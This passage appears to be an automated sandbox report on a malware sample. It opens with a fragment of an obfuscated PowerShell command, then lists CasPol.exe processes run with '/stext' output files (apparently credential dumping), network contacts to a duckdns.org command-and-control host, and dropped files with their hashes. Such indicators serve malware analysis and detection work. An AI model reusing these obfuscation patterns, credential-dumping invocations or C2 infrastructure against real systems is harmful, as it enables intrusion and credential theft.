([cHar]117+[cHar]83+[cHar]122),[cHar]36 -CREpLAce 'aQp',[cHar]124) )"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnugjtsarsygayuirucchkhgc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnugjtsarsygayuirucchkhgc"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\pihzjllcfaqlceimaxpdsxcxdyhm"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkmjkewvtiiqmseqkhbfvcwolfzvnaig"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkmjkewvtiiqmseqkhbfvcwolfzvnaig"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | 138.171.94.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.209.215.142.in-addr.arpa | udp |
| US | 23.94.171.138:80 | 23.94.171.138 | tcp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | whatgodcanntdothat.duckdns.org | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| US | 8.8.8.8:53 | 36.228.227.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 192.227.228.36:14645 | whatgodcanntdothat.duckdns.org | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4372-0-0x000000007129E000-0x000000007129F000-memory.dmp
memory/4372-1-0x0000000004B40000-0x0000000004B76000-memory.dmp
memory/4372-2-0x0000000071290000-0x0000000071A40000-memory.dmp
memory/4372-3-0x00000000051B0000-0x00000000057D8000-memory.dmp
memory/4372-4-0x0000000071290000-0x0000000071A40000-memory.dmp
memory/4372-5-0x0000000005050000-0x0000000005072000-memory.dmp
memory/4372-7-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/4372-6-0x0000000005A50000-0x0000000005AB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfk5pu0n.ble.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4372-17-0x0000000005C30000-0x0000000005F84000-memory.dmp
memory/4372-18-0x00000000060E0000-0x00000000060FE000-memory.dmp
memory/4372-19-0x0000000006130000-0x000000000617C000-memory.dmp
memory/2368-29-0x00000000077F0000-0x0000000007822000-memory.dmp
memory/2368-30-0x000000006DB50000-0x000000006DB9C000-memory.dmp
memory/2368-40-0x00000000077B0000-0x00000000077CE000-memory.dmp
memory/2368-41-0x0000000007830000-0x00000000078D3000-memory.dmp
memory/2368-42-0x0000000007FC0000-0x000000000863A000-memory.dmp
memory/2368-43-0x0000000007970000-0x000000000798A000-memory.dmp
memory/2368-44-0x00000000079E0000-0x00000000079EA000-memory.dmp
memory/2368-45-0x0000000007C00000-0x0000000007C96000-memory.dmp
memory/2368-46-0x0000000007B70000-0x0000000007B81000-memory.dmp
memory/2368-47-0x0000000007BA0000-0x0000000007BAE000-memory.dmp
memory/2368-48-0x0000000007BB0000-0x0000000007BC4000-memory.dmp
memory/2368-49-0x0000000007CC0000-0x0000000007CDA000-memory.dmp
memory/2368-50-0x0000000007BF0000-0x0000000007BF8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\awmmgca1\awmmgca1.cmdline
| MD5 | 63deff13c0a46790d99818066994ad55 |
| SHA1 | 09eb79e41022e3ec078f24e20ec32b08e0fe9f46 |
| SHA256 | ee1c034b1bc6ab429a91e4dfd03c0e5a8043788c38a9a174a085ad3ec0a55ee3 |
| SHA512 | cd280139a1330fc1226cb52c29c43de74a4834c24041c640a9534d04c06cb0e3e231fc004e85f48954f499e8bfb796c1116f1c1129160213b49a595a705a24bd |
\??\c:\Users\Admin\AppData\Local\Temp\awmmgca1\awmmgca1.0.cs
| MD5 | 3acd336f0bedb873ee783ee181c191ff |
| SHA1 | ef57a3ee45eba0918f34b5eb8640cad14c65ca9e |
| SHA256 | ed4508bd17e5ecb9f847135624310d5a51c108bbb2ae43bf65f7678b561e71fa |
| SHA512 | 51e10cf11020d2a298a2f05ac59d5b41877d2b096adef0b1aa29e57cecc1dde7f9276e1ff3b6916ee23701495fc983cd54f24b5c9ece1e43e46daa31eb906117 |
\??\c:\Users\Admin\AppData\Local\Temp\awmmgca1\CSCA2E087D4A4634244BD604312E622BB51.TMP
| MD5 | 3497abadc3833b8e31f90edba8cc491b |
| SHA1 | b09941acd04c441ab8d55a01e7f47041ffd73744 |
| SHA256 | 98034225dd526899dd2224c7dc0aee29198f37d4dad747158e0f891a563621b2 |
| SHA512 | b8731ae771a6a73851a3de78c5c77940fea3656bad89d109265744361164506c15dfb629ac50d956d0fc62473c0a03fb3dffc1dfec647958c9fe3a2cfebdfa63 |
C:\Users\Admin\AppData\Local\Temp\RES9470.tmp
| MD5 | b82984cb8cfc24f202ea1deba1f6a82f |
| SHA1 | b4f7144d2a47b3077fa068256628744b33aef4f8 |
| SHA256 | f890e05cb07fa9dce08f701685f3d0e334e8a085c215a7d4f92946a9e482f314 |
| SHA512 | 91be3ad8aa78e2d80c8d7d7a87ff7fdc731523074139f1ed0cadd8518c63474516f7d3b88c2c058231c8dc89cd78f175a70e07524c884a3c4b4459c7e7103928 |
C:\Users\Admin\AppData\Local\Temp\awmmgca1\awmmgca1.dll
| MD5 | 86be7637da9157a70835dcd4dd28cc64 |
| SHA1 | d3d5c792d84faea0faff2f2fcf2dedd02c685424 |
| SHA256 | 4d0711d9138e9b134edf4c954c45ab661bea0b6e9e5a24d2d49652b1c4828474 |
| SHA512 | 9f473ddd5ba1865f5aaca88f5f6d07d0526059386a7a27ff7f502db381978d31a96b06349926f0f6b6fd24d3e644b27f5f8e890b3c4cc74bce93cf1f41aa87a2 |
memory/4372-65-0x0000000006690000-0x0000000006698000-memory.dmp
memory/4372-71-0x00000000074B0000-0x00000000074D2000-memory.dmp
memory/4372-72-0x0000000008470000-0x0000000008A14000-memory.dmp
memory/4372-73-0x000000007129E000-0x000000007129F000-memory.dmp
memory/4372-74-0x0000000071290000-0x0000000071A40000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatthingswithouthandletheth.vbs
| MD5 | 6234bbb162edd9092f298bc3fc3580f9 |
| SHA1 | ce76d6cde8d930269e7c91be5d96f8202b0a45d5 |
| SHA256 | efae71d7eb1ab6860ab593ed670d8274fca4f3aac8473fe1cb39c18d0edd2ec2 |
| SHA512 | f16c5f4d0f2a09cf8d62a5756cbf16faccfa690ba86442962982941b925e5deb572505e9ff0ad5aa5ea48babe05ea6a64f769f27582edc29613a6958b20cf83f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c384430160e35efa59912f695bf60822 |
| SHA1 | 9e72cc1652dd386796f920f3ed86ded495873e55 |
| SHA256 | ebb1012f1fca3e670b452eb976bc3a28428926cadb31c992ba24eeaaf105ec14 |
| SHA512 | 3902ad9989d3d7f383291f75201fdf21784a225cafd4a0c3037e5931195633ab6b7099eb7080820816cda9caf935f0bd4e6cd61e9911b333f7e2690e09ea7738 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWErshell.ExE.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
memory/4372-81-0x0000000071290000-0x0000000071A40000-memory.dmp
memory/1032-87-0x0000000005880000-0x0000000005BD4000-memory.dmp
memory/2320-102-0x0000000007020000-0x0000000007178000-memory.dmp
memory/2320-103-0x0000000007180000-0x000000000721C000-memory.dmp
memory/3696-104-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-105-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-106-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d3d1381bb7f6f6e0712293b15a9bc3f7 |
| SHA1 | 8e05f6f0e82115be0b84e883360be00dd982c05e |
| SHA256 | 8a5b1546ef00b1c51fd27b9bda13961966ad1734571f020189fbdda9ee1d1c82 |
| SHA512 | 2bd7c57c1dc59af1058390c7ab02ea4b703404eccecc2f06a72d38411cec7c9a96463f864b43e5123f3a075141ea3aef65039584df1fe91e594e4b340dab6490 |
memory/3696-110-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-111-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-112-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-113-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-114-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-116-0x0000000000400000-0x000000000047F000-memory.dmp
memory/2572-117-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2572-120-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3864-119-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3736-121-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3864-118-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3736-122-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3864-124-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3736-123-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2572-125-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nnugjtsarsygayuirucchkhgc
| MD5 | 60a0bdc1cf495566ff810105d728af4a |
| SHA1 | 243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6 |
| SHA256 | fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2 |
| SHA512 | 4445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5 |
memory/3696-131-0x0000000010000000-0x0000000010019000-memory.dmp
memory/3696-135-0x0000000010000000-0x0000000010019000-memory.dmp
memory/3696-136-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-134-0x0000000010000000-0x0000000010019000-memory.dmp
memory/3696-137-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-138-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-139-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-140-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-141-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-142-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-143-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3696-144-0x0000000000400000-0x000000000047F000-memory.dmp